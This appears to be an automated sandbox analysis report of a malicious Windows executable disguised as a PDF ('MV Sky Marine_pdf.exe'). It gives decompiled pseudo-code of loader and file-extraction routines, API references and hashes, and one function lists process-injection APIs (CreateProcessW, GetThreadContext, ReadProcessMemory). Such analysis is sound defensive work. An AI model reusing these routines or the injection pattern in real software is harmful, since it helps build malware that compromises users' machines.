                                                                                                  • Source File: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: CreateFileFreeVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 204039940-0
                                                                                                  • Opcode ID: d3d50f87e061235e971d25f62681f105daa64d995d1a15accd96cd7252c73184
                                                                                                  • Instruction ID: 6898cdb3987a2b32fc35578c2ad4086051b66c9c82523831343ba455854e1d25
                                                                                                  • Opcode Fuzzy Hash: d3d50f87e061235e971d25f62681f105daa64d995d1a15accd96cd7252c73184
                                                                                                  • Instruction Fuzzy Hash: 11A12274E00209EFEF01CFE4D885BAEBBB5FF09351F20845AE901BA2A4C7755A80DB15
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00406046, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00406046(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                                                                  0x0040605d
                                                                                                  0x00406066
                                                                                                  0x00406068
                                                                                                  0x00406068
                                                                                                  0x0040606c
                                                                                                  0x0040607e
                                                                                                  0x00406078
                                                                                                  0x00406078
                                                                                                  0x00406078
                                                                                                  0x00406082
                                                                                                  0x00406096
                                                                                                  0x004060aa
                                                                                                  0x004060b1

                                                                                                  APIs
                                                                                                  • GetSystemDirectoryA.KERNEL32 ref: 0040605D
                                                                                                  • wsprintfA.USER32 ref: 00406096
                                                                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060AA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                  • String ID: %s%s.dll$UXTHEME$\
                                                                                                  • API String ID: 2200240437-4240819195
                                                                                                  • Opcode ID: dbe29b16d36e4990d4b8a8d99ebd83d4bb69569e7e7cd5a56c72b64b27b98503
                                                                                                  • Instruction ID: 3700f7ad53493798de0dfa87506cf657db0e618a932e247f1bfd1d2edecc8456
                                                                                                  • Opcode Fuzzy Hash: dbe29b16d36e4990d4b8a8d99ebd83d4bb69569e7e7cd5a56c72b64b27b98503
                                                                                                  • Instruction Fuzzy Hash: 6BF0FC309401156AEB14D764DC0DFFB376CA708305F1405B6B546F20D2D674E9258B99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00403079, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 93%
                                                                                                  			E00403079(intOrPtr _a4) {
				long _v4;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t33;
				long _t34;
				intOrPtr _t36;
				void* _t38;
				long _t39;
				intOrPtr _t52;

				_t34 =  *0x795944; // 0x2dc9b
				_t36 = _t34 -  *0x40b070 + _a4;
				 *0x7a27ac = GetTickCount() + 0x1f4;
				if(_t36 <= 0) {
					L23:
					E00402C06(1);
					return 0;
				}
				E00403227( *0x79d954);
				SetFilePointer( *0x409018,  *0x40b070, 0, 0); // executed
				 *0x79d950 = _t36;
				 *0x795940 = 0;
				while(1) {
					_t12 =  *0x795948; // 0x33c11
					_t33 = 0x4000;
					_t13 = _t12 -  *0x79d954;
					if(_t13 <= 0x4000) {
						_t33 = _t13;
					}
					_t14 = E004031F5(0x791940, _t33); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x79d954 =  *0x79d954 + _t33;
					 *0x40b078 = 0x791940;
					 *0x40b07c = _t33;
					L6:
					L6:
					if( *0x7a27b0 != 0 &&  *0x7a2840 == 0) {
						 *0x795940 =  *0x79d950 -  *0x795944 - _a4 +  *0x40b070;
						E00402C06(0);
					}
					 *0x40b080 = 0x789940;
					 *0x40b084 = 0x8000;
					if(E00406191(?str?) < 0) {
						goto L21;
					}
					_t38 =  *0x40b080; // 0x78f5db
					_t39 = _t38 - 0x789940;
					if(_t39 == 0) {
						__eflags =  *0x40b07c; // 0x0
						if(__eflags != 0) {
							goto L21;
						}
						__eflags = _t33;
						if(_t33 == 0) {
							goto L21;
						}
						L17:
						_t18 =  *0x795944; // 0x2dc9b
						if(_t18 -  *0x40b070 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x409018, _t18, 0, 0); // executed
						goto L23;
					}
					_t21 = WriteFile( *0x409018, 0x789940, _t39,  &_v4, 0); // executed
					if(_t21 == 0 || _t39 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40b070 =  *0x40b070 + _t39;
						_t52 =  *0x40b07c; // 0x0
						if(_t52 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}
















                                                                                                  0x0040307d
                                                                                                  0x0040308a
                                                                                                  0x0040309d
                                                                                                  0x004030a2
                                                                                                  0x004031e3
                                                                                                  0x004031e5
                                                                                                  0x00000000
                                                                                                  0x004031eb
                                                                                                  0x004030ae
                                                                                                  0x004030c1
                                                                                                  0x004030c7
                                                                                                  0x004030cd
                                                                                                  0x004030d8
                                                                                                  0x004030d8
                                                                                                  0x004030dd
                                                                                                  0x004030e2
                                                                                                  0x004030ea
                                                                                                  0x004030ec
                                                                                                  0x004030ec
                                                                                                  0x004030f5
                                                                                                  0x004030fc
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403102
                                                                                                  0x00403108
                                                                                                  0x0040310e
                                                                                                  0x00000000
                                                                                                  0x00403114
                                                                                                  0x0040311a
                                                                                                  0x0040313a
                                                                                                  0x0040313f
                                                                                                  0x00403144
                                                                                                  0x0040314a
                                                                                                  0x00403150
                                                                                                  0x00403161
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403163
                                                                                                  0x00403169
                                                                                                  0x0040316b
                                                                                                  0x0040319f
                                                                                                  0x004031a5
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004031a7
                                                                                                  0x004031a9
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004031ab
                                                                                                  0x004031ab
                                                                                                  0x004031be
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004031cd
                                                                                                  0x00000000
                                                                                                  0x004031cd
                                                                                                  0x0040317b
                                                                                                  0x00403183
                                                                                                  0x004031da
                                                                                                  0x004031e0
                                                                                                  0x004031e0
                                                                                                  0x00000000
                                                                                                  0x0040318b
                                                                                                  0x0040318b
                                                                                                  0x00403191
                                                                                                  0x00403197
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040319d
                                                                                                  0x004031de
                                                                                                  0x004031de
                                                                                                  0x00000000
                                                                                                  0x004031de
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • GetTickCount.KERNEL32 ref: 0040308E
                                                                                                    • Part of subcall function 00403227: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402ED3,?), ref: 00403235
                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F84,00000004,00000000,00000000,00000000,?,?,?,00402EFA,000000FF,00000000), ref: 004030C1
                                                                                                  • WriteFile.KERNELBASE(00789940,0078F5DB,00000000,00000000,5Qy,00791940,00004000,?,00000000,?,00402F84,00000004,00000000,00000000,00000000,?), ref: 0040317B
                                                                                                  • SetFilePointer.KERNELBASE(0002DC9B,00000000,00000000,5Qy,00791940,00004000,?,00000000,?,00402F84,00000004,00000000,00000000,00000000,?,?), ref: 004031CD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: File$Pointer$CountTickWrite
                                                                                                  • String ID: 5Qy
                                                                                                  • API String ID: 2146148272-1469602788
                                                                                                  • Opcode ID: 03cea7c52989f1e595e257d5b21e8a2e0a29f62b4c2e5f88bcf5479e34d25f8e
                                                                                                  • Instruction ID: 506e25ed5180e632e4bd4ad1002f7ff9ccba4cce050c735e25e11a5b74d121aa
                                                                                                  • Opcode Fuzzy Hash: 03cea7c52989f1e595e257d5b21e8a2e0a29f62b4c2e5f88bcf5479e34d25f8e
                                                                                                  • Instruction Fuzzy Hash: AE419F71904215DFD7209F29FE44A277BACF749376704423BE810BA2E0D7396E068B9D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00401F84, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 60%
                                                                                                  			E00401F84(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x7a2858");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x7a2828 =  *0x7a2828 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A29(0xfffffff0);
				 *(_t34 + 8) = E00402A29(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00405010(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x7a3000, 0x40b030, " (z"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403717(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                                  0x00401f84
                                                                                                  0x00401f84
                                                                                                  0x00401f89
                                                                                                  0x00401f90
                                                                                                  0x0040204c
                                                                                                  0x00402197
                                                                                                  0x00402197
                                                                                                  0x004028be
                                                                                                  0x004028c1
                                                                                                  0x004028cd
                                                                                                  0x004028cd
                                                                                                  0x00401f9f
                                                                                                  0x00401fa9
                                                                                                  0x00401fac
                                                                                                  0x00401fbb
                                                                                                  0x00401fbf
                                                                                                  0x00401fc5
                                                                                                  0x00401fc9
                                                                                                  0x00402045
                                                                                                  0x00000000
                                                                                                  0x00402045
                                                                                                  0x00401fcb
                                                                                                  0x00401fd5
                                                                                                  0x00401fd9
                                                                                                  0x0040201d
                                                                                                  0x00401fdb
                                                                                                  0x00401fde
                                                                                                  0x00401fe1
                                                                                                  0x00402011
                                                                                                  0x00401fe3
                                                                                                  0x00401fe6
                                                                                                  0x00401fef
                                                                                                  0x00401ff1
                                                                                                  0x00401ff1
                                                                                                  0x00401fef
                                                                                                  0x00401fe1
                                                                                                  0x00402025
                                                                                                  0x0040203a
                                                                                                  0x0040203a
                                                                                                  0x00000000
                                                                                                  0x00402025
                                                                                                  0x00401faf
                                                                                                  0x00401fb5
                                                                                                  0x00401fb9
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FAF
                                                                                                    • Part of subcall function 00405010: lstrlenA.KERNEL32(0079E578,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C7D,00000000,?), ref: 00405049
                                                                                                    • Part of subcall function 00405010: lstrlenA.KERNEL32(00402C7D,0079E578,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C7D,00000000), ref: 00405059
                                                                                                    • Part of subcall function 00405010: lstrcatA.KERNEL32(0079E578,00402C7D,00402C7D,0079E578,00000000,00000000,00000000), ref: 0040506C
                                                                                                    • Part of subcall function 00405010: SetWindowTextA.USER32(0079E578,0079E578), ref: 0040507E
                                                                                                    • Part of subcall function 00405010: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050A4
                                                                                                    • Part of subcall function 00405010: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050BE
                                                                                                    • Part of subcall function 00405010: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050CC
                                                                                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                  • String ID: (z
                                                                                                  • API String ID: 2987980305-713140602
                                                                                                  • Opcode ID: edea848ad3fa281bb5ab7df7451079881bea4adce82f85ba55a32d944a29b622
                                                                                                  • Instruction ID: 8b8487f6955b63f09aa0c92159221d6f4ccc760f28bb0bee438aaf66ace1f0b4
                                                                                                  • Opcode Fuzzy Hash: edea848ad3fa281bb5ab7df7451079881bea4adce82f85ba55a32d944a29b622
                                                                                                  • Instruction Fuzzy Hash: 42215B72D04215ABDF217FA48E4CAAE7970AF45314F20423BF611B62E0C7BC4982965E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00405A2A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00405A2A(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                                                  0x00405a2e
                                                                                                  0x00405a34
                                                                                                  0x00405a35
                                                                                                  0x00405a35
                                                                                                  0x00405a36
                                                                                                  0x00405a3d
                                                                                                  0x00405a47
                                                                                                  0x00405a54
                                                                                                  0x00405a57
                                                                                                  0x00405a5f
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405a63
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405a65
                                                                                                  0x00000000
                                                                                                  0x00405a65
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • GetTickCount.KERNEL32 ref: 00405A3D
                                                                                                  • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405A57
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: CountFileNameTempTick
                                                                                                  • String ID: "C:\Users\user\Desktop\MV Sky Marine_pdf.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                  • API String ID: 1716503409-2514542992
                                                                                                  • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                                                  • Instruction ID: 7d3f24f284717398f58f3b08164f4a48f1e09f969be73e86d89c445038905459
                                                                                                  • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                                                  • Instruction Fuzzy Hash: 6FF027363082447BE7104E25DC44BDB3F9CDF81710F14C027FA049A2C0D2B09A44CBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00402F4E, Relevance: 7.6, APIs: 5, Instructions: 109fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 92%
                                                                                                  			E00402F4E(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t42;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x7a27f8;
					 *0x795944 = _t44;
					SetFilePointer( *0x409018, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E00403079(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409018,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x795944 =  *0x795944 + _t57;
						_t32 = E00403079(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409018, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x795944 =  *0x795944 + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										if(ReadFile( *0x409018, 0x791940, _t55,  &_v8, 0) == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x791940, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x795944 =  *0x795944 + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}
















                                                                                                  0x00402f53
                                                                                                  0x00402f5d
                                                                                                  0x00402f66
                                                                                                  0x00402f6a
                                                                                                  0x00402f75
                                                                                                  0x00402f75
                                                                                                  0x00402f7d
                                                                                                  0x00402f7f
                                                                                                  0x00402f86
                                                                                                  0x00402fa2
                                                                                                  0x00402fa6
                                                                                                  0x0040306f
                                                                                                  0x0040306f
                                                                                                  0x00000000
                                                                                                  0x00402fb5
                                                                                                  0x00402fb8
                                                                                                  0x00402fbe
                                                                                                  0x00402fc5
                                                                                                  0x00402fc8
                                                                                                  0x00402fd1
                                                                                                  0x0040303e
                                                                                                  0x00403044
                                                                                                  0x00403046
                                                                                                  0x00403046
                                                                                                  0x00403058
                                                                                                  0x0040305c
                                                                                                  0x00000000
                                                                                                  0x0040305e
                                                                                                  0x0040305e
                                                                                                  0x00403061
                                                                                                  0x00403067
                                                                                                  0x00000000
                                                                                                  0x00403067
                                                                                                  0x00402fd3
                                                                                                  0x00402fd6
                                                                                                  0x0040306a
                                                                                                  0x0040306a
                                                                                                  0x00402fdc
                                                                                                  0x00402fe1
                                                                                                  0x00402fe1
                                                                                                  0x00402fe9
                                                                                                  0x00402feb
                                                                                                  0x00402feb
                                                                                                  0x00403000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403014
                                                                                                  0x0040301c
                                                                                                  0x0040303a
                                                                                                  0x00403071
                                                                                                  0x00403071
                                                                                                  0x00403023
                                                                                                  0x00403023
                                                                                                  0x00403026
                                                                                                  0x00403029
                                                                                                  0x0040302c
                                                                                                  0x00403036
                                                                                                  0x00000000
                                                                                                  0x00403038
                                                                                                  0x00000000
                                                                                                  0x00403038
                                                                                                  0x00403036
                                                                                                  0x00000000
                                                                                                  0x0040301c
                                                                                                  0x00000000
                                                                                                  0x00402fe1
                                                                                                  0x00402fd6
                                                                                                  0x00402fd1
                                                                                                  0x00402fc8
                                                                                                  0x00402fa6
                                                                                                  0x00403072
                                                                                                  0x00403076

                                                                                                  APIs
                                                                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EFA,000000FF,00000000,00000000,?,?), ref: 00402F75
                                                                                                  • ReadFile.KERNELBASE(?,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EFA,000000FF,00000000,00000000,?), ref: 00402FA2
                                                                                                  • ReadFile.KERNEL32(00791940,00004000,?,00000000,?,?,00402EFA,000000FF,00000000,00000000,?,?), ref: 00402FFC
                                                                                                  • WriteFile.KERNELBASE(00000000,00791940,?,000000FF,00000000,?,00402EFA,000000FF,00000000,00000000,?,?), ref: 00403014
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: File$Read$PointerWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 2113905535-0
                                                                                                  • Opcode ID: 1b24eb38e2c43651d082d2ada225c5565e7c8f32904bb9a4818c579b6989de34
                                                                                                  • Instruction ID: b057b85792893b74ca80cd052a2a7d490093157c7c3f191d8fc599f6dc27c4b8
                                                                                                  • Opcode Fuzzy Hash: 1b24eb38e2c43651d082d2ada225c5565e7c8f32904bb9a4818c579b6989de34
                                                                                                  • Instruction Fuzzy Hash: 73310A31901219EBDB21CF59DD44EAA3BBCEB403A5B20413AF908B6195D2349E51DB69
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 1000314C, Relevance: 6.6, APIs: 4, Instructions: 558processthreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 1000349F
                                                                                                  • GetThreadContext.KERNELBASE(?,00010007), ref: 100034C2
                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 100034E6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Process$ContextCreateMemoryReadThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2411489757-0
                                                                                                  • Opcode ID: b5614021e3f317e942b0d5079720772f1b177410f7571481354c138ecce27dc6
                                                                                                  • Instruction ID: 08cec40162e0bd9ece182989d3d7ecdd054c29dc5090fd32b361ecfeeb5e1282
                                                                                                  • Opcode Fuzzy Hash: b5614021e3f317e942b0d5079720772f1b177410f7571481354c138ecce27dc6
                                                                                                  • Instruction Fuzzy Hash: 2B322975E40248EEEB61CB94DC45BEEB7B9EF08741F208496E608FA2A0D7715E80DF15
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004015B3, Relevance: 3.1, APIs: 2, Instructions: 66COMMON
